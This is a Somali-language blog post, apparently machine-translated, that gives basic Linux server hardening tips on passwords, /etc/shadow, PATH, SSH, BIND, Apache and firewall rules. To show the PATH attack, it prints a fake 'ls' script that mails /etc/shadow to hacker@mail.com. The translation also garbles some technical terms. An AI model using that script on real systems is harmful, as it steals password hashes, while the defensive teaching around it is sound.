Tilmaamaha Amniga ee Linux (Server) (Qeybta 1)

Muddo dheer ayaan waxba ku daabicin barta internetka waxaanan jecelahay inaan idinla wadaago talo laga soo qaatay buugga, (Kuwa kale). Waxaan ka helay Jaamacadda waana aqriyay oo inkasta oo ay runti yara duugowday iyo farsamooyinka la muujiyay aad bay u yar tahay inay shaqeeyaan marka loo eego isbeddelka nidaamka, iyaguna sidoo kale waa arrimo xiiso leh oo la muujin karo. 9788448140502

Waxaan rabaa in aan cadeeyo in kuwani ay yihiin tilmaamo ku wajahan nidaamka Linux ee loo adeegsado adeege ahaan, dhexdhexaad ama laga yaabee baaxad weyn oo la siiyay taas oo ah heerka isticmaalaha desktop-ka, in kasta oo la adeegsan karo, hadana wax faa'iido ah ma lahan.

Waxaan sidoo kale ka digayaa inay yihiin talooyin fudud oo deg deg ah oo aanan faahfaahin badan ka bixin doonin, in kasta oo aan qorsheynayo inaan sameeyo qoraal kale oo aad uga faahfaahsan oo ballaadhan mowduuc gaar ah. Laakiin taas waan arki doonaa goor dambe. Aan bilowno.

Siyaasadaha sirta ah. 

In kasta oo ay u egtahay kelmad-qabsi, haysashada siyaasad sir ah oo wanaagsan ayaa farqiga u dhexeeya nidaamka nugul ama maya Weerarada sida "xoog caayaan" waxay ka faa'iideystaan ​​haysashada erey sir ah oo xun si ay u helaan nidaam. Tilmaamaha ugu caansan waa:

  • Isku soo darka far waaweyn iyo ka yar.
  • Adeegso jilayaal gaar ah.
  • Lambarada.
  • In kabadan 6 lambar (waxaan rajeyneynaa in kabadan 8).

Intaa waxaa dheer, aan tixgelinno laba feylal oo muhiim ah.  / iwm / passwd iyo / iwm / hooska.

Wax aad muhiim u ah waa faylka / iwm / passwd. Intaas waxaa sii dheer inaad na siiso magaca isticmaalaha, uidkiisa, marinkiisa galka, bash .. iwm. xaaladaha qaarkood waxay sidoo kale muujineysaa furaha sirta ah ee isticmaalaha.

 Aynu eegno halabuurkeeda caadiga ah.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

isticmaale: cryptkey: uid: gid: path :: path: bash

Dhibaatada dhabta ah ee halkan ka jirta, ayaa ah in faylkan gaarka ahi leeyahay rukhsado -rw-r - r– taas oo macnaheedu yahay inay aqrisay rukhsad uu isticmaale kasta ku leeyahay nidaamka. iyo haysashada furaha sirta ah ma ahan wax aad u adag in la fahmo midka dhabta ah.

Taasi waa sababta faylku u jiro / iwm / hooska. Kani waa feylka meesha oo dhammaan furayaasha isticmaaleyaashu ku kaydsan yihiin, iyo waxyaabo kale. Faylkani wuxuu leeyahay rukhsadaha lagama maarmaanka ah si aan isticmaale u akhriyi karin.

Si tan loo saxo markaa, waa inaan tagnaa faylka / etc / passwd oo u beddelo furaha sirta ah "x", tani waxay kaydin doontaa oo keliya furaha feylkeena / iwm / hooska.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Dhibaatooyinka PATH iyo .bashrc iyo kuwa kale.

Markuu adeegsade fuliyo amar ku saabsan qunsuliyadooda, qolofku wuxuu raadiyaa amarkaas oo ku jira liiska tilmaamaha ku jira isbeddelka jawiga PATH.

Haddii aad ku qorto "echo $ PATH" qunsulka wuxuu soo saari doonaa wax sidan oo kale ah.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Mid kasta oo ka mid ah faylkan ayaa ah halka qolofku ka raadin doono amarka loo qoray si loo fuliyo. Isaga "." waxay ka dhigan tahay in galka ugu horeeya ee wax laga raadsadaa uu yahay isla galka meesha amarka laga fuliyo.

Ka soo qaad inuu jiro isticmaale "Carlos" oo isticmaalehaan wuxuu doonayaa inuu "shar sameeyo." Isticmaalahan ayaa uga tagi kara fayl la yiraahdo "ls" faylkiisa weyn, faylkanna wuxuu ku fulinayaa amar sida:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Oo haddii qofka isticmaalaha asalka u ah waxyaabaha meesha la tegayo, isku dayo inuu liisto galka ku jira faylka carlos (maadaama ay marka hore raadineyso amarka isla galkaas, si kama 'ah waxay u diri laheyd feylasha leh erayga sirta ah emaylkan ka dibna fayllada) noqon lahaa oo isagu ma uu heli lahaa ilaa goor dambe.

Si taas looga fogaado waa inaan baabi'innaa "." ee doorsoomaha PATH.

Sidaas si la mid ah, faylasha sida /.bashrc, /.bashrc_profile, ./.login waa in la hubiyaa oo la hubiyaa inaysan jirin "." isbeddelka 'PATH', iyo xaqiiqda feylasha sidan oo kale ah, waad beddeli kartaa halka loo socdo amar gaar ah.

Tilmaamaha adeegyada:

SHH

  • Jooji nooca 1 ee nidaamka ssh ee faylka sshd_config.
  • Ha u oggolaan isticmaalaha asalka inuu ku soo galo ssh.
  • Faylasha iyo faylku ssh_host_key, ssh_host_dsa_key iyo ssh_host_rsa_key waa inuu akhriyaa oo keliya isticmaalaha xididka.

BIND

  • Beddel farriinta soo dhaweynta ee ku jirta faylka loo yaqaan 'magacaabay.conf' si aysan u tusin lambarka nooca
  • Xaddid wareejinta aagga, oo kaliya u oggolow kooxaha u baahan.

Apache

  • Ka hor istaag adeegga inuu ku soo bandhigo noocaaga farriinta soo dhaweynta. Tafatir faylka httpd.conf oo ku dar ama wax ka beddel khadadka:  

ServerSignature Off
ServerTokens Prod

  • Jooji tilmaam otomaatig ah
  • U habee Apache inaadan u adeegin faylasha xasaasiga ah sida .htacces, * .inc, * .jsp .. iwm
  • Ka saar boggaga nin ama muunad adeegga
  • Apache ku orod jawi chrooted ah

Amniga Shabakada.

Waa lagama maarmaan in la daboolo dhammaan gelitaanka suurtagalka ah ee nidaamkaaga shabakadda dibedda, halkan waxaa ku yaal tilmaamo muhiim ah oo looga hortagayo kuwa soo duulay inay iskaan iyo macluumaad ka helaan shabakaddaada.

Jooji taraafikada ICMP

Firewall-ka waa in loo qaabeeyaa si uu u xannibo dhammaan noocyada taraafikada ICMP ee soo galaya iyo kuwa baxaya iyo jawaabaha echo. Tan waxaad kaga fogaaneysaa taas, tusaale ahaan, sawir qaade ka raadinaya qalab nool noocyo badan oo IP ah ayaa kugu helaya. 

Iska ilaali baaritaanka ping TCP.

Hal dariiqo oo lagu baaro nidaamkaaga waa baaritaanka Ping-ka ee TCP. Ka soo qaad in on your server waxaa jira Apache server on dekedda 80. Xadgudbaha u diri karaa codsi ACK ah in dekedda ah, Tan, haddii nidaamka jawaab, computer wuu noolaan doonaa oo iskaan doonaa inta kale ee dekedaha.

Tan awgeeda, gidaarkaagu waa inuu had iyo jeer heystaa ikhtiyaar "wacyi gelin dawladeed" waana inuu iska tuuraa dhammaan baakadaha ACK ee aan u dhigmin isku xirnaanta TCP ama kal hore.

Qaar ka mid ah talooyinka dheeraadka ah:

  • U adeegso nidaamyada IDS-ka si aad ugu ogaatid baaritaanka dekedda shabakaddaada.
  • U habeeyso Firewall si aysan ugu kalsoonaan isku xirnaanta goobaha dekedda.

Tani waa sababta oo ah baaritaannada qaarkood waxay isticmaalaan dekedda laga helo "been abuurka ah" sida 20 ama 53, maaddaama nidaamyo badan ay aaminaan dekeddaas maxaa yeelay waxay yihiin nooc ka mid ah ftp ama DNS ah.

MAALIN: Xusuusnow in inta badan dhibaatooyinka lagu muujiyey boostadan horeyba loogu xalliyay ku dhowaad dhammaan qaybinta hadda jirta. Laakiin waligeed dhib malahan inaad hesho macluumaad muhiim ah oo ku saabsan dhibaatooyinkaan si aysan kugu dhicin adiga.

MAALIN: Goor dambe ayaan arki doonaa mowduuc gaar ah waxaanan samayn doonaa qoraal ay ku jiraan macluumaad aad u faahfaahsan oo hadda jira.

Qof walba wuu ku qanciyaa akhriskiisa.

Thanks.


Nuxurka maqaalka wuxuu u hogaansamayaa mabaadi'deena anshaxa tifaftirka. Si aad u soo sheegto khalad guji Halkan.

Faallo, ka tag taada

Ka tag faalladaada

cinwaanka email aan la daabacin doonaa.

*

*

  1. Masuul ka ah xogta: Miguel Ángel Gatón
  2. Ujeedada xogta: Xakamaynta SPAM, maaraynta faallooyinka.
  3. Sharci: Oggolaanshahaaga
  4. Isgaarsiinta xogta: Xogta looma gudbin doono dhinacyada saddexaad marka laga reebo waajibaadka sharciga ah.
  5. Kaydinta xogta: Macluumaadka ay martigelisay Shabakadaha Occentus (EU)
  6. Xuquuqda: Waqti kasta oo aad xadidi karto, soo ceshan karto oo tirtiri karto macluumaadkaaga.

  1.   wargelin ah dijo

    Runtii aad ayaan uga helay maqaalka waana xiiseynayaa mowduuca, waxaan kugu dhiiri galinayaa inaad sii wado soo dejinta waxyaabaha.